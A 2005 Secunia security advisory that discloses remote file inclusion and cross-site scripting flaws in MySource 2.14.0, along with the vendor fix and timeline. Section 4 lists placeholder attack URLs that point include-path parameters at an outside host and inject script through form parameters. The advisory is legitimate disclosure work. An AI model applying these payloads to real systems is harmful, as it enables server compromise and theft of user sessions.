======================================================================
Secunia Research 18/10/2005
- MySource Cross-Site Scripting and File Inclusion Vulnerabilities -
======================================================================
Table of Contents
Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerabilities.......................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
About Secunia........................................................8
Verification.........................................................9
======================================================================
1) Affected Software
MySource 2.14.0
Prior versions may also be affected.
======================================================================
2) Severity
Rating: Highly critical
Impact: Cross-site scripting and system access
Where: Remote
======================================================================
3) Vendor's Description of Software
MySource is a powerful, open source website and intranet content
publishing and management system. It is designed to enable
technically unskilled users to build and maintain their own web
solutions securely, professionally and inexpensively.
Product link:
http://mysource.squiz.net/
======================================================================
4) Description of Vulnerabilities
Secunia Research has discovered some vulnerabilities in MySource,
which can be exploited by malicious people to conduct
cross-site scripting attacks and compromise a vulnerable system.
1) Some input isn't properly verified, before it used to include
files. This can be exploited to include arbitrary files from external
and local resources.
Examples:
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?
INCLUDE_PATH=http://[host]/[file]?
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?
SQUIZLIB_PATH=http://[host]/[file]?
http://[victim]/web/init_mysource.php?
INCLUDE_PATH=http://[host]/[file]?
http://[victim]/pear/Net_Socket/Socket.php?
PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/HTTP_Request/Request.php?
PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail/Mail.php?
PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date.php?
PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date/Span.php?
PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mimeDecode.php?
PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mime.php?
PEAR_PATH=http://[host]/[file]?
Successful exploitation requires that "register_globals" is enabled
and that the affected scripts are placed accessible inside the
web root.
2) Some input isn't properly sanitised before being returned to the
user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.
Examples:
http://[victim]/web/edit/upgrade_in_progress_backend.php?
target_url=">[code]
http://[victim]/squizlib/bodycopy/pop_ups/insert_table.php?
bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_props.php?
bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/header.php?
bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_row_props.php?
bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_props.php?
bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/
edit_table_cell_type_wysiwyg.php?stylesheet=">[code]
Successful exploitation requires that "register_globals" is enabled
and that the affected scripts are placed accessible inside the
web root.
The vulnerabilities have been confirmed in version 2.14.0. Prior
versions may also be affected.
======================================================================
5) Solution
The vendor has fixed the vulnerabilities in version 2.14.2 by warning
the user during the installation process about the security risks of
placing MySource script files in a publicly available folder and
having "register_globals" enabled.
Users should set "register_globals" to "Off" and ensure that the
MySource installation is moved out of the web root.
Installation process updated in version 2.14.2:
http://mysource.squiz.net/download/downloads/download_2.14.2
======================================================================
6) Time Table
30/09/2005 - Vulnerabilities discovered.
03/10/2005 - Vendor notified.
18/10/2005 - Vendor releases new version.
18/10/2005 - Public disclosure.
======================================================================
7) Credits
Discovered by Secunia Research.
======================================================================
8) About Secunia
Secunia collects, validates, assesses, and writes advisories regarding
all the latest software vulnerabilities disclosed to the public. These
advisories are gathered in a publicly available database at the
Secunia website:
http://secunia.com/
Secunia offers services to our customers enabling them to receive all
relevant vulnerability information to their specific system
configuration.
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/secunia_security_advisories/
======================================================================
9) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2005-51/advisory/
======================================================================